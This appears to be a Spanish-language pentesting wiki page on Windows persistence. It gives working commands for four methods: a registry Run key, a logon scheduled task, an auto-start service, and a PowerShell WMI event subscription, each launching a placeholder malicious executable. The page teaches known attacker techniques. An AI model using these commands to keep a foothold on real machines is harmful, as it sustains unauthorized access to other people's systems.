Persistencia en Windows
Claves del Registro
Modificar claves del registro es una técnica común para lograr persistencia. Al agregar entradas maliciosas en el registro, los atacantes pueden asegurarse de que su código se ejecute automáticamente al iniciar el sistema.
Run/RunOnce:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MyApp /t REG_SZ /d "C:\ruta\maliciosa.exe"
Tareas Programadas
Los atacantes pueden crear tareas programadas que ejecuten su payload en intervalos regulares o al inicio del sistema.
schtasks:
schtasks /create /sc onlogon /tn "MyTask" /tr "C:\ruta\maliciosa.exe"
Servicios de Windows
Crear o modificar servicios de Windows para que ejecuten el payload al inicio del sistema.
sc:
sc create MyService binPath= "C:\ruta\maliciosa.exe" start= auto
WMI Event Subscription
Utilizar WMI para suscribirse a eventos del sistema y ejecutar código malicioso en respuesta a ciertos eventos, como el inicio del sistema.
PowerShell:
$filter = Set-WmiInstance -Namespace "root\subscription" -Class __EventFilter -Arguments @{
Name = "MyEventFilter";
EventNamespace = "root\cimv2";
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime'";
QueryLanguage = "WQL";
}
$consumer = Set-WmiInstance -Namespace "root\subscription" -Class CommandLineEventConsumer -Arguments @{
Name = "MyConsumer";
CommandLineTemplate = "C:\ruta\maliciosa.exe";
}
Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{
Filter = $filter;
Consumer = $consumer;
}
Última actualización
¿Te fue útil?